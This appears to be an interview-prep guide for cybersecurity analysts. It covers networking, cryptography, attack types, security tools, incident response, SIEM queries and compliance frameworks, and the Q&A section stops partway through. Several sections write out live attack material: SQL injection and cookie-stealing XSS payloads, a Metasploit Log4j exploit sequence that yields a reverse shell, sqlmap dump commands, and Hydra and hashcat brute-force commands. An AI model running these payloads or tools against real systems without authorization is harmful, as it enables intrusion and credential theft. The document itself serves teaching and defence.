Cybersecurity Analyst

$75K–$140K
US Salary Range
30+
Interview Q&As
40+
Critical Tools

Table of Contents

Networking Fundamentals
Security Concepts
Attack Types & Techniques
Security Tools
Incident Response
Logs & SIEM
Threat Intelligence
Compliance & Frameworks
Interview Q&As
Glossary

Networking Fundamentals

OSI Model - 7 Layers

Layer Name Function Protocols/Examples
7 Application User interfaces, APIs HTTP, SMTP, DNS, SSH
6 Presentation Data formatting, encryption TLS/SSL, JPEG, encryption
5 Session Connection management RPC, WinRM
4 Transport End-to-end communication TCP (reliable), UDP (fast)
3 Network Routing, IP addressing IP, ICMP, IPSec
2 Data Link MAC addressing, switching Ethernet, ARP, 802.11
1 Physical Cables, signals CAT6, Fiber, radio

TCP vs UDP

Feature TCP UDP
Reliability Reliable (retransmits) Unreliable (fire-and-forget)
Connection Connection-oriented (handshake) Connectionless
Speed Slower (more overhead) Faster (less overhead)
Use Cases Email, Web, SSH, FTP Video, gaming, DNS, VoIP

TCP Three-Way Handshake

/* Establishing TCP connection */
Client → Server: SYN "seq=100"
Server → Client: SYN-ACK "seq=300, ack=101"
Client → Server: ACK "seq=101, ack=301"

/* Connection established - data can flow */

/* Closing connection (FIN) */
Client → Server: FIN "seq=500"
Server → Client: ACK "ack=501"
Server → Client: FIN "seq=600"
Client → Server: ACK "ack=601"

Common Network Ports

Port(s) Service Protocol Notes
20/21 FTP TCP File transfer (unencrypted)
22 SSH TCP Secure shell
25/465/587 SMTP TCP Email sending
53 DNS UDP/TCP Domain name resolution
80 HTTP TCP Unencrypted web
110/995 POP3 TCP Email retrieval
143/993 IMAP TCP Email retrieval (sync)
389/636 LDAP TCP Directory service
443 HTTPS TCP Encrypted web
3306 MySQL TCP Database
3389 RDP TCP/UDP Remote desktop
5432 PostgreSQL TCP Database

IP Addressing & Subnetting

/* IPv4 structure: A.B.C.D */
192.168.1.0/24
/*
   Network: 192.168.1.0
   Netmask: 255.255.255.0 (/24 = 24 bits = network)
   Hosts: .1 to .254 (256 total, .0=network, .255=broadcast)
   Usable: 254 IPs
*/

/* Common CIDR ranges */
/8  = 16777216 hosts (Class A)
/16 = 65536 hosts (Class B)
/24 = 256 hosts (Class C)
/25 = 128 hosts
/32 = 1 host

/* Private IP ranges (non-routable) */
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16

DNS Resolution Process

/* User types: https://www.example.com */

1. Recursive Query: Client → Local Resolver "resolve example.com"

2. Iterative Queries:
   Resolver → Root Nameserver "where is .com?"
   Root → "ask TLD server 192.0.35.8"

   Resolver → TLD Nameserver "where is example.com?"
   TLD → "ask authoritative 93.184.216.34"

   Resolver → Authoritative NS "what's example.com?"
   Auth → "93.184.216.34"

3. Response back through chain to Client

/* Response cached at each level for TTL (Time To Live) */

ARP Protocol & Poisoning

/* ARP = Address Resolution Protocol - maps IP to MAC address */

Legitimate ARP Request:
Host A "who is 192.168.1.100? tell 192.168.1.1"
Host B "that's me at MAC aa:bb:cc:dd:ee:ff"

ARP Poisoning Attack:
Attacker "I am 192.168.1.1 (gateway)" (lies with attacker's MAC)
All hosts update ARP cache to point gateway to attacker
Traffic flows through attacker (Man-in-the-Middle)

Prevention:
- Static ARP entries
- ARP monitoring tools
- Switch port security
- VLAN isolation

Firewalls & ACLs

/* Stateful firewall - remembers connection state */
Allow established connections (traffic within session)
Deny new inbound connections by default
Allow outbound traffic

/* iptables rule example (Linux) */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -j DROP

/* Allow SSH only from 192.168.1.0/24 */
iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j DROP

Core Security Concepts

CIA Triad

Component Definition Example Threats
Confidentiality Only authorized access to data Encryption, access controls Data breach, eavesdropping
Integrity Data unaltered and authentic Hashing, digital signatures Tampering, malware
Availability Systems accessible when needed Redundancy, DDoS protection DDoS, outages

AAA Framework

Cryptography Basics

Type Algorithm Key Size Speed Use Case
Symmetric AES 128/192/256 bit Fast Encrypt large data
Symmetric 3DES (deprecated) 168 bit Slow Legacy systems
Asymmetric RSA 2048/4096 bit Slow Key exchange, signatures
Asymmetric ECC 256 bit Faster than RSA Modern TLS
Hash SHA-256 256 bit output Fast, one-way Integrity, passwords
Hash MD5 (broken) 128 bit Very fast Don't use - collisions found

Hashing & Salting

/* Password hashing with salt prevents rainbow table attacks */

Without salt:
password "secret" → hash "5e884898da28047151d0e56f8dc62927"
Anyone with hash lookup table finds password immediately

With salt:
salt = random bytes (stored in DB)
password "secret" + salt → hash "a3f5b8c2d9e1f4a7..."
Different salt = different hash (even for same password)

Modern approach: Use bcrypt, Argon2, scrypt (slow by design)
bcrypt("password", cost=12)
Takes ~100ms to compute, defeats brute force

TLS Handshake Process

/* Establishing HTTPS connection */

1. ClientHello
   Client → Server: TLS version, supported ciphers, random number

2. ServerHello
   Server → Client: chosen cipher, certificate, random number

3. Certificate
   Server → Client: X.509 certificate with public key

4. ServerKeyExchange (if needed)
   Server → Client: ephemeral parameters (ECDHE)

5. ClientKeyExchange
   Client → Server: encrypted pre-master secret

6. ChangeCipherSpec
   Both: switch to encrypted communication

7. Finished
   Both: verify handshake integrity

Result: Symmetric session key established for data encryption

Zero Trust Architecture

Core principle: "Never trust, always verify" - verify every access request regardless of location.

Defense in Depth

/* Multiple security layers to prevent single point of failure */

Perimeter:
  - Firewall
  - WAF (Web Application Firewall)
  - IDS/IPS

Network:
  - Segmentation/VLANs
  - Intrusion detection
  - Network monitoring

Host:
  - Antivirus/EDR
  - Host-based firewall
  - File integrity monitoring

Application:
  - Input validation
  - Authentication/authorization
  - Secure coding practices

Data:
  - Encryption at rest
  - Encryption in transit
  - Access controls
  - Backups

Attack Types & Techniques

Reconnaissance - Gathering Information

Type Method Tools Detection Difficulty
Passive OSINT Google dorks, LinkedIn, whois Shodan, Censys, theHarvester None (no traffic)
Active Scanning Port scans, service fingerprinting Nmap, Masscan Easy (generates logs)
Enumeration Version detection, service discovery Nmap -sV, bannering Medium

SQL Injection Attacks

/* Vulnerable code */
query = "SELECT * FROM users WHERE email='" + email + "'"

/* Attack payload in email field */
' OR '1'='1
/* Executes: SELECT * FROM users WHERE email='' OR '1'='1' */
/* Returns all users! */

/* UNION-based injection */
' UNION SELECT username, password FROM admin_users --

/* Blind SQL injection (no visible output) */
' AND 1=1 --  /* True - page behaves normally */
' AND 1=2 --  /* False - page behaves differently */
/* Attacker infers data via time delays or responses */

/* Prevention: Use parameterized queries */
query = "SELECT * FROM users WHERE email = ?"
db.query(query, [email])

XSS (Cross-Site Scripting)

/* Reflected XSS - via URL parameter */
URL: http://site.com/search?q=<script>alert(document.cookie)</script>
Victim clicks link → script executes in browser → steals cookie

/* Stored XSS - via database */
Attacker posts comment: <img src=x onerror='fetch("/steal?c=" + document.cookie)'>
Every user viewing comment → cookie stolen
More dangerous than reflected (persistent)

/* DOM-based XSS */
JavaScript: document.getElementById('content').innerHTML = userInput
Attacker: userInput = <svg onload='alert(1)'>

/* Prevention */
1. Always escape output (React does this by default)
2. Content-Security-Policy: restrict inline scripts
3. Input validation (whitelist expected formats)
4. Use template engines that auto-escape

OWASP Top 10 Web Vulnerabilities

# Vulnerability Example Attack Prevention
1 Injection (SQL, XSS, XXE) SQL: ' OR '1'='1; XSS: <script> Parameterized queries, escape output
2 Broken Authentication Weak passwords, no MFA, session fixation MFA, strong password policy, secure sessions
3 Sensitive Data Exposure Unencrypted passwords, PII in logs Encryption at rest/transit, data minimization
4 IDOR (Insecure Direct Object Reference) Modify URL /user/123 to /user/124 Verify user owns resource, use GUIDs
5 Security Misconfiguration Default passwords, exposed .git, debug on Security hardening, disable debug, regular updates
6 Vulnerable & Outdated Components Old Log4j vulnerability in dependencies Keep dependencies updated, vulnerability scanning
7 Insecure Deserialization Malicious object deserialization RCE Validate serialized data, whitelist classes
8 SSRF (Server-Side Request Forgery) Force server to request internal IP Block internal IP ranges, allowlist domains
9 XXE (XML External Entity) <!DOCTYPE> with SYSTEM entities Disable DTD processing, XML schema validation
10 Insufficient Logging & Monitoring Breaches undetected for months Log security events, SIEM, alerting

CSRF (Cross-Site Request Forgery)

/* Attacker tricks authenticated user into making unwanted request */

Attack scenario:
1. User logs into bank.com, authenticated (has session cookie)
2. User visits evil.com (still has bank.com cookie in browser)
3. evil.com has: <img src="bank.com/transfer?to=attacker&amount=1000">
4. Browser sends request with user's bank.com cookie
5. Transfer succeeds (browser doesn't know it's from evil.com)

Prevention:
1. Same-Site cookies: Set-Cookie: sessionid=...; SameSite=Strict
2. CSRF tokens: Server generates random token, form must include it
3. Check Referer header
4. Double-submit cookies (token in cookie and form)

DDoS (Denial of Service)

Type Attack Method Bandwidth Mitigation
Volumetric UDP flood, ICMP flood, DNS amplification Gbps - Tbps (high) CDN, ISP filtering, rate limiting
Protocol SYN flood, Slowloris, Smurf Varies (medium) SYN cookies, connection limits, WAF
Application HTTP flood, Slow reads, Slow POST Lower bandwidth (medium) WAF, rate limiting, bot detection

Malware Types

APT (Advanced Persistent Threat)

Security Tools — Practical Commands

Nmap - Network Scanning

# Basic port scan - determine if ports are open nmap 192.168.1.1 # Service and OS detection nmap -sV -O 192.168.1.1 # Aggressive scan (version, OS, script, traceroute) nmap -A 192.168.1.1 # Scan specific ports nmap -p 22,80,443 192.168.1.1 # Scan all ports nmap -p- --min-rate 5000 192.168.1.1 # UDP scan (DNS, DHCP, SNMP) nmap -sU -p 53,161 192.168.1.1 # Scan entire subnet nmap -sn 192.168.1.0/24 # Vulnerability scanning with NSE scripts nmap --script vuln 192.168.1.1 # Stealthy scan (slow, harder to detect) nmap -sS -T2 192.168.1.1

Wireshark - Packet Analysis

/* Capture filters (before capture) */
tcpdump -i eth0 -w capture.pcap port 80

/* Display filters (after capture) */
tcp.port == 80                  /* HTTP traffic */
http                           /* HTTP protocol */
ip.addr == 192.168.1.100      /* Specific IP */
tcp.flags.syn == 1             /* SYN packets only */
dns                            /* DNS queries */

/* Follow TCP stream to see full conversation */
Right-click packet → Follow → TCP Stream

Burp Suite - Web App Testing

# Launch Burp Suite burpsuite Workflow: 1. Configure proxy: 127.0.0.1:8080 2. Enable interception in browser 3. Make request through Burp 4. Right-click → Send to Repeater (modify and resend) 5. Send to Intruder (fuzz parameters) 6. Use Decoder (Base64, URL encoding) 7. Scanner detects vulnerabilities Common tests: - SQL injection in fields - XSS in comment/search - CSRF tokens - Authentication bypass

Metasploit - Exploitation Framework

/* Metasploit msfconsole workflow */

search ssh_version_scanner     /* Search for modules */
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24     /* Target range */
set THREADS 50                /* Parallel threads */
run                             /* Execute module */

/* Exploit example */
search CVE-2021-44228          /* Log4j vulnerability */
use exploit/multi/misc/log4j_rce_cve_2021_44228
set LHOST 192.168.1.100      /* Your IP for callback */
set LPORT 4444                /* Your listening port */
set RHOSTS target.com
exploit                         /* Execute exploit */
/* Receives reverse shell */

SQLmap - SQL Injection Automation

# Test URL for SQL injection sqlmap -u "http://target.com/page?id=1" --dbs # Extract database names sqlmap -u "http://target.com/page?id=1" --dbs # List tables in specific database sqlmap -u "http://target.com/page?id=1" -D databasename --tables # Dump table contents sqlmap -u "http://target.com/page?id=1" -D databasename -T users --dump # POST request with data sqlmap -u "http://target.com/login" --data="username=admin&password=test" --dbs # Test specific parameter sqlmap -u "http://target.com/page?id=1&name=test" -p id --dbs

John the Ripper & Hashcat - Password Cracking

/* John the Ripper - simple, CPU-focused */
john --wordlist=rockyou.txt --format=md5 hash.txt
john --show hash.txt                      /* Show cracked passwords */

/* Hashcat - GPU-optimized, faster */
hashcat -a 0 -m 0 hash.txt wordlist.txt
/*
   -a 0 = dictionary attack
   -m 0 = MD5 hash
   -m 100 = SHA-1
   -m 1400 = SHA-256
*/

/* Mask attack (brute force with pattern) */
hashcat -a 3 -m 0 hash.txt ?l?l?l?d?d
/*
   ?l = lowercase a-z
   ?u = uppercase A-Z
   ?d = digit 0-9
   ?s = special chars
*/

Splunk - SIEM & Log Analysis

/* Splunk Query Language (SPL) examples */

/* Search failed login attempts */
index=windows EventCode=4625 | stats count by src_ip | sort - count

/* Find top destination IPs by volume */
index=firewall action=allowed | stats sum(bytes) as total by dest_ip | sort - total

/* Timeline of DNS queries */
index=dns | timechart count by query_domain limit=10

/* Alert on unusual authentication activity */
index=auth action=failure | stats count by user | where count > 5

/* Web server error spikes */
index=apache status=500 | timechart count by host

Nessus/OpenVAS - Vulnerability Scanning

# OpenVAS CLI (free alternative to Nessus) openvas Steps: 1. Create scan with target IP/range 2. Select policy (Full, Web App, etc.) 3. Run scan (takes 10-60 min) 4. Review results by CVSS score 5. Export report (PDF, CSV) CVSS Severity: 9.0-10.0 = Critical 7.0-8.9 = High 4.0-6.9 = Medium 0.1-3.9 = Low 0.0 = None

Hydra - Network Brute Force

# SSH brute force with wordlist hydra -l admin -P passwords.txt ssh://192.168.1.1 # FTP brute force hydra -L usernames.txt -P passwords.txt ftp://192.168.1.1 # HTTP login page hydra -l admin -P rockyou.txt http-post-form "192.168.1.1/login:user=^USER^&pass=^PASS^:F=Login Failed" # SMB (Windows) hydra -L usernames.txt -P passwords.txt smb://192.168.1.1 # Parallel threads hydra -t 16 -l admin -P passwords.txt ssh://192.168.1.1

Incident Response Lifecycle

NIST IR Phases

Phase Activities Deliverables Key Tools
1. Preparation IR plan, playbooks, team training, tools ready Playbook, CIRT roster, tools list EDR, SIEM, forensic tools
2. Detection & Analysis Detect incident, triage, severity, scope Incident ticket, alert, containment plan SIEM, IDS/IPS, SOC dashboard
3. Containment Isolate, block IOCs, prevent spread Containment plan, affected asset list Firewall, EDR, network isolation
4. Eradication Remove malware, patch, reset credentials Remediation steps, patch updates Antivirus, patching tools
5. Recovery Restore systems, validate clean, monitor Recovery plan, system status report Backups, system monitoring
6. Post-Incident Root cause analysis, lessons learned, improvements Post-incident report, action items Documentation, process review

Triage & Severity Classification

Priority Definition Response Time Examples
P1 Critical Production outage, data exfiltration in progress Immediate Ransomware, data breach, RCE
P2 High Significant business impact, active threat 1-4 hours Malware detected, unauthorized access
P3 Medium Potential impact, lower risk 1-2 days Policy violation, suspicious activity
P4 Low Minimal impact, informational 1 week Failed login attempts, config drift

Forensic Preservation

/* Evidence collection - maintain chain of custody */

/* Memory dump (captures RAM - volatile) */
volatility imageinfo -f memory.bin    /* Identify OS profile */
volatility -f memory.bin -profile Win7SP1x64 pslist  /* List processes */
volatility -f memory.bin -profile Win7SP1x64 netscan /* Network connections */

/* Disk imaging (preserves non-volatile) */
dd if=/dev/sda of=disk_image.img bs=4M /* Create image */
md5sum disk_image.img > disk_image.md5  /* Hash for integrity */

/* Log preservation */
find /var/log -type f | xargs tar czf logs_backup.tar.gz
scp logs_backup.tar.gz forensics_server:/evidence/

/* Timeline creation */
fls -r /mnt/image | mactime -z UTC | sort -k1

Common IOCs (Indicators of Compromise)

Logs & SIEM

Windows Security Event IDs

Event ID Event Name Significance Response
4624 Successful Logon User logged in (normal activity) Monitor for suspicious accounts/times
4625 Failed Logon Failed login attempt (brute force if high count) Alert after N failed attempts
4648 Explicit Credentials Used Lateral movement indicator (runas) Investigate unusual credential use
4688 Process Created Execution indicator, command line captured Look for suspicious processes
4720 User Account Created Persistence mechanism Verify if authorized
4776 NTLM Authentication Credential validation Monitor for hash-spraying attacks
7045 Service Installed Malware persistence Validate legitimate services
1102 Audit Log Cleared Evidence destruction (critical!) Immediate investigation

Linux Log Locations

/* Critical log files */
/var/log/auth.log          /* Authentication attempts (Debian/Ubuntu) */
/var/log/secure            /* Authentication attempts (RedHat/CentOS) */
/var/log/syslog            /* System messages */
/var/log/kernel            /* Kernel messages */
/var/log/cron              /* Cron job execution */
/var/log/apache2/access.log /* Web server requests */
/var/log/apache2/error.log  /* Web server errors */
/var/log/sudo              /* Privilege escalation attempts */

/* View failed SSH logins */
grep "Failed password" /var/log/auth.log | wc -l
grep "Invalid user" /var/log/auth.log | cut -d' ' -f8 | sort | uniq -c

Splunk SPL Query Examples

/* Alert on brute force (20+ failed logins in 5 min) */
index=windows EventCode=4625
| stats count as failures by src_ip
| where failures > 20
| alert

/* Find lateral movement (explicit credentials on multiple hosts) */
index=windows EventCode=4648
| stats dc(ComputerName) as host_count by SubjectUserName
| where host_count > 3

/* Detect potential data exfiltration (large outbound transfers) */
index=firewall src_zone=internal dest_zone=external
| stats sum(bytes_out) as total_out by src_ip
| where total_out > 1000000000

/* Find command execution with suspicious keywords */
index=windows EventCode=4688 CommandLine=* (powershell OR cmd OR rundll32)
| search CommandLine=*http* OR CommandLine=*iex* OR CommandLine=*Base64*
| table ComputerName, User, CommandLine

Threat Intelligence

MITRE ATT&CK Framework

14 Tactics covering full attack lifecycle: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

Kill Chain Model

Phase Description Defense Example
1. Reconnaissance Gathering info on target OSINT monitoring, domain security LinkedIn scraping, Shodan
2. Weaponization Create exploit package Vulnerability management, patching Malware development
3. Delivery Transmit to victim Email filtering, web filtering Phishing, drive-by download
4. Exploitation Execute exploit code Patching, EDR, behavior blocking Buffer overflow, zero-day
5. Installation Establish persistence EDR, Sysmon, file integrity monitoring Backdoor, scheduled task
6. Command & Control Attacker communication Network monitoring, IDS, firewall Malware beacon
7. Actions on Objectives Achieve mission (steal, destroy, etc) DLP, activity monitoring, logging Data exfiltration, destruction

Diamond Model

/* Threat analysis model connecting 4 key elements */

        Capability (How)
        /              \
       /                \
   Adversary --- Victim
      \                /
       \              /
    Infrastructure (Where)

Edges:
- Adversary ↔ Capability: What tools/skills does attacker have?
- Adversary ↔ Infrastructure: What infra does attacker control?
- Infrastructure ↔ Capability: How is infra used for attack?
- All ↔ Victim: Who/what is targeted?

Analysis helps attribute attacks and predict future activity

Threat Intel Sources

Threat Hunting

Compliance & Frameworks

NIST Cybersecurity Framework (CSF)

Function Purpose Example Activities
Identify Understand assets and risks Asset inventory, risk assessment, business continuity
Protect Implement safeguards Access control, encryption, training, segmentation
Detect Find security incidents Monitoring, alerting, SIEM, anomaly detection
Respond Address incidents Incident response plan, investigation, remediation
Recover Restore systems Backup/restore, business continuity, lessons learned

ISO 27001 (ISMS - Information Security Management System)

PCI DSS (Payment Card Industry Data Security Standard)

Requirement # Focus Area Key Control
1 Firewall configuration Proper network segmentation
2 Change defaults Change default passwords, remove unnecessary services
3 Cardholder data protection Encryption, minimal storage
4 Encryption Strong cryptography for transmission
5 Malware protection Antivirus/anti-malware
6 Secure development Secure SDLC, code review, testing
7 Access control Least privilege, strong authentication
8 User identification Account uniqueness, MFA, strong passwords
9 Physical security Data center access controls
10 Logging & monitoring Comprehensive audit trails
11 Security testing Vulnerability scanning, penetration testing
12 Information security policy Written security policies, incident response

GDPR (General Data Protection Regulation)

SOC 2 (System and Organization Controls)

Top 30 Cybersecurity Interview Questions

1. Explain the OSI model and where attacks occur
OSI has 7 layers. Layer 1-2 (Physical/Data Link): packet sniffing, ARP spoofing. Layer 3-4 (Network/Transport): IP spoofing, SYN flood. Layer 5-6 (Session/Presentation): session hijacking, man-in-the-middle. Layer 7 (Application): XSS, SQL injection, DDoS. Different defenses apply at each layer - firewall at network layer, WAF at application layer.
2. What is the difference between IDS and IPS?
IDS (Intrusion Detection System) detects suspicious traffic and alerts. IPS (Intrusion Prevention System) detects AND blocks traffic. IDS is passive (monitoring), IPS is active (blocking). IPS can cause legitimate traffic disruption if rules are wrong. Both use signature-based (known attacks) and anomaly-based (behavioral) detection. Examples: Snort, Suricata.
3. How does SQL injection work and how do you prevent it?
SQL injection exploits unvalidated user input in SQL queries. Attacker inserts SQL commands (e.g., ' OR '1'='1) to bypass authentication or extract data. Prevention: (1) Use parameterized queries/prepared statements, (2) Input validation/whitelist, (3) ORM frameworks, (4) Least privilege database accounts, (5) WAF rules. Never concatenate user input into queries.
4. Walk me through incident response process
NIST IR phases: (1) Preparation - tools ready, playbooks created, (2) Detection & Analysis - alert detected, triage severity, (3) Containment - isolate affected systems, block IOCs, (4) Eradication - remove malware, patch vulnerability, reset credentials, (5) Recovery - restore systems from clean backup, validate, (6) Post-incident - RCA, lessons learned, process improvement. Each phase has specific activities and success criteria.
5. Difference between symmetric and asymmetric encryption
Symmetric: single shared key encrypts/decrypts (AES, 3DES). Fast, best for large data. Problem: key distribution. Asymmetric: public key encrypts, private key decrypts (RSA, ECC). Slow, best for key exchange. Solution to distribution problem. TLS uses both: asymmetric to exchange symmetric keys, then symmetric for data. Tradeoff: speed vs security/distribution ease.
6. Explain TLS handshake
TLS handshake establishes secure connection: (1) ClientHello - TLS version, ciphers, random nonce, (2) ServerHello - chosen cipher, certificate, nonce, (3) Certificate validation - client verifies server's certificate chain, (4) Key exchange - ECDHE generates ephemeral key, both derive session key from shared secret, (5) ChangeCipherSpec - switch to encryption, (6) Finished - verify handshake integrity. Result: encrypted channel with forward secrecy (PFS).
7. What is a SIEM and how do you use it?
SIEM (Security Information & Event Management) aggregates logs from all sources (firewalls, servers, apps). Features: correlation (find related events), normalization (parse different formats), alerting (rules trigger alerts on patterns), dashboarding, reporting. Use cases: detect brute force (multiple failed logins), lateral movement (explicit credential use), data exfiltration (large outbound transfers). Examples: Splunk, Elastic, IBM QRadar. Requires proper log parsing and tuning.
8. What is Zero Trust security?
Zero Trust: "Never trust, always verify" - all users/devices/requests are untrusted by default. Core principles: verify identity (strong auth, MFA), validate device (posture check), least privilege access, microsegmentation (isolate network), assume breach (detect lateral movement), continuous monitoring. Works in hybrid/cloud better than perimeter security. Solves insider threat and advanced attacks. Implementation requires major architecture change.
9. How do you investigate a compromised server?
(1) Preserve evidence - memory dump, disk image, copy logs, (2) Identify compromise - when/how entry occurred, check access logs, (3) Scope - what systems affected, lateral movement, (4) Find indicators - IOCs (hashes, IPs, domains), YARA rules for malware, (5) Remove threat - kill malicious processes, delete malware, patch exploit, reset credentials, (6) Validate clean - scan with clean tools, monitoring, (7) Document - timeline, findings, lessons learned. Use Volatility for memory analysis, dd for disk imaging.
10. What is privilege escalation?
Privilege escalation: attacker gains higher-privilege access (user → root/admin). Vertical: lower privilege → higher privilege. Horizontal: same privilege on different account. Windows: kernel exploit, misconfigurations (sudo NOPASSWD), unquoted paths, registry write-ability. Linux: SUID bits, sudo abuse, kernel vulnerabilities. Prevention: least privilege, disable unnecessary services, keep kernel/OS patched, monitor privilege changes, restrict sudo, remove SUID bits on unnecessary binaries.
11. Explain CSRF and XSS differences
CSRF (Cross-Site Request Forgery): Attacker tricks authenticated user into making unwanted request (e.g., transfer money) by putting malicious link on site. Browser sends user's cookies automatically. XSS (Cross-Site Scripting): Attacker injects malicious JavaScript into page, runs in user's browser, can steal cookies/data. CSRF is request forgery (wrong action), XSS is code injection (wrong data). Prevent CSRF: SameSite cookies, CSRF tokens. Prevent XSS: escape output, CSP header, input validation.
12. What are the phases of a penetration test?
(1) Scoping & Rules of Engagement - define targets, timeline, legal authorization, (2) Reconnaissance - gather public info (passive), then active scanning (Nmap), (3) Scanning & Enumeration - port scan, service detection, version identification, (4) Vulnerability Analysis - identify CVEs, weak config, misconfigurations, (5) Exploitation - attempt to gain access, escalate privilege, lateral movement, (6) Post-Exploitation - maintain access, document findings, (7) Reporting - executive summary, technical findings, recommendations, remediation timeline.
13. How does ARP poisoning work?
ARP (Address Resolution Protocol) maps IPs to MAC addresses. Attacker sends gratuitous ARP saying "I am 192.168.1.1 (gateway) at MAC xx:xx:xx:xx:xx:xx" (lies with attacker's MAC). All hosts update ARP cache believing gateway is attacker. All traffic meant for gateway flows through attacker (man-in-the-middle). Attacker can eavesdrop, modify packets, perform SSL stripping. Prevention: static ARP entries, ARP monitoring (alert on changes), DAI (Dynamic ARP Inspection), VLAN isolation, switch port security.
14. What is MITRE ATT&CK framework?
MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world observations. 14 Tactics (high-level goals): Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command & Control, Exfiltration, Impact. Each Tactic has Techniques with Sub-techniques. Used for: threat hunting (search for technique IOCs), detection engineering (create alerts for techniques), incident response (identify attacker TTPs). Essential for defenders.
15. How do you perform threat hunting?
Threat hunting is proactive search for undetected threats. Approach: (1) Hypothesis - "Attackers may create scheduled tasks for persistence", (2) Data collection - pull from SIEM, EDR, firewall logs, (3) Analysis - create queries to find IOCs/anomalies, (4) Investigation - determine if benign or malicious, (5) IOC extraction - collect indicators, (6) Reporting - find undetected compromise, improve detection rules. Tools: Splunk, Jupyter notebooks, EDR dashboards. Success metrics: confirmed breaches found, detection improvement, operational understanding.
16. Explain Nmap and its scanning techniques
Nmap maps networks, discovers hosts/ports/services. Scan types: -sS (SYN, stealthy), -sT (TCP connect), -sU (UDP), -sA (ACK - firewall rule testing), -sP (ping sweep - hosts alive). -sV detects service versions, -O guesses OS, -A aggressive (all info). Port states: open (accept), closed (reject), filtered (firewall blocked). Output: -oN (normal), -oX (XML), -oG (grepable). Timing: -T2 (slow, evasive), -T5 (fast, noisy). Common: nmap -A -p- 192.168.1.1. Generates logs - detectable by IDS.
17. What is phishing and how do you defend?
Phishing: social engineering attack using fraudulent emails to trick users into revealing credentials/sensitive data or clicking malicious links. Types: mass phishing (generic), spear phishing (targeted specific person), whaling (targets executives), smishing (SMS phishing). Defenses: (1) Email filtering - block known phishing domains, sandboxing suspicious links, (2) DMARC/SPF/DKIM - prevent spoofing, (3) User training - recognize phishing red flags, (4) MFA - even if credential stolen, still can't login, (5) Monitoring - unusual email activity, bulk sends from internal accounts, (6) Report button - employees report suspicious emails.
18. How do you analyze malware?
Malware analysis: determine functionality, IOCs, detection patterns. Static analysis: examine binary (disassemble), no execution, safe (reverse engineer with IDA Pro, Ghidra). Dynamic analysis: run in sandbox (any.run, Cuckoo), watch behavior - network calls, file modifications, registry changes. Behavioral analysis: identify what malware does (C&C communication, data exfiltration, persistence mechanism). Tools: YARA to create detection rules. Report: hash, C&C IP/domain, file created/modified, registry changes, detected by scanners (VirusTotal). Useful for attribution, response, detection.
19. What is the kill chain model?
Cyber kill chain (Lockheed Martin): Reconnaissance (OSINT), Weaponization (craft exploit), Delivery (send), Exploitation (execute), Installation (persistence), Command & Control (remote access), Actions on Objectives (steal/destroy). Defense disrupts each phase: block recon (OSINT monitoring), block delivery (email filtering), block execution (patching), detect installation (EDR), detect C2 (network monitoring), monitor objectives (DLP). Early disruption (detection) prevents later phases. Knowledge helps defenders create layered protection.
20. Explain CVSS scoring
CVSS (Common Vulnerability Scoring System) quantifies vulnerability severity (0-10). Metrics: Base (intrinsic properties: complexity, privileges, attack vector), Temporal (current state: exploit availability, patch status), Environmental (org-specific: affected asset value). Severity: 9.0-10.0 Critical, 7.0-8.9 High, 4.0-6.9 Medium, 0.1-3.9 Low. Higher score = more urgent patching. CVSS 9+ get immediate action, Medium often low priority. Used to prioritize patching. Note: CVSS doesn't account for context (breach probability, compensating controls).
21. What is cloud security and key controls?
Cloud security: shared responsibility between provider (infrastructure) and customer (data, access). Key controls: IAM (strong auth, MFA, least privilege, rotate keys), network security (security groups = firewall rules, VPC isolation), encryption (at-rest, in-transit), monitoring (CloudTrail logs all API calls), vulnerability scanning, incident response, compliance (check provider's cert). Risks: misconfiguration (overly permissive security groups), exposed credentials (hardcoded in code), no encryption, inadequate monitoring. CSP provides compliance reports (SOC 2, PCI-DSS) - verify before using.
22. How do you validate a certificate?
Certificate validation checks: (1) Certificate chain - client verifies each cert from end-entity to trusted root CA, (2) Expiration - current date within validity period (notBefore to notAfter), (3) Revocation - check CRL or OCSP - is cert revoked? (4) Hostname match - certificate CN or SAN matches requested domain, (5) Signature verification - issuer's signature valid with public key, (6) Key usage - cert allowed for purpose (TLS, code signing, etc). Attacks: expired cert, self-signed (no chain), wrong hostname (man-in-the-middle), revoked. Modern: OCSP stapling (include revocation status in TLS handshake).
23. What is DNS security and DNSSEC?
DNS translates domain names to IPs - critical infrastructure. Attacks: DNS spoofing (fake response), cache poisoning (inject false records), DNS tunneling (exfiltrate data via DNS), DNS flood (DDoS). DNSSEC adds cryptographic signatures to DNS records. Client verifies signature with public key. Prevents spoofing/poisoning. Deployment: complex chain of trust (root → TLD → domain), requires KSK (Key Signing Key) rotation. Adoption low (harder troubleshooting, NSEC enumeration risk). Defense-in-depth: validate domains, rate limiting, monitoring, RPZ (Response Policy Zones).
24. How does segmentation improve security?
Network segmentation divides network into isolated zones (VLANs, subnets, security zones). Benefits: limits lateral movement (attacker can't jump to all systems), contains breach (isolate compromised zone), improves monitoring (traffic between zones visible), applies least privilege (only needed traffic allowed). Example: DMZ (external-facing web servers) isolated from internal database servers. Microsegmentation (zero trust): every conversation validated, not just zone-level. Tools: firewall rules, network ACLs, VLANs, software-defined networking. Requires planning, good network diagram, ongoing maintenance.
25. What is forensic analysis?
Forensics: collect, preserve, analyze evidence of incident. Steps: (1) Preservation - isolate system, image disk (dd), dump memory (Volatility), preserve logs, maintain chain of custody, (2) Timeline creation - reconstruct when each event occurred (file creation, process execution, login), (3) File analysis - recover deleted files, identify hidden files/directories, check metadata, (4) Memory analysis - find malware, attacker activity, (5) Log analysis - identify attack vectors, lateral movement. Tools: EnCase, FTK, Volatility, forensic artifact parser. Produces timeline and root cause for incident response/legal action.
26. How do cryptographic attacks work?
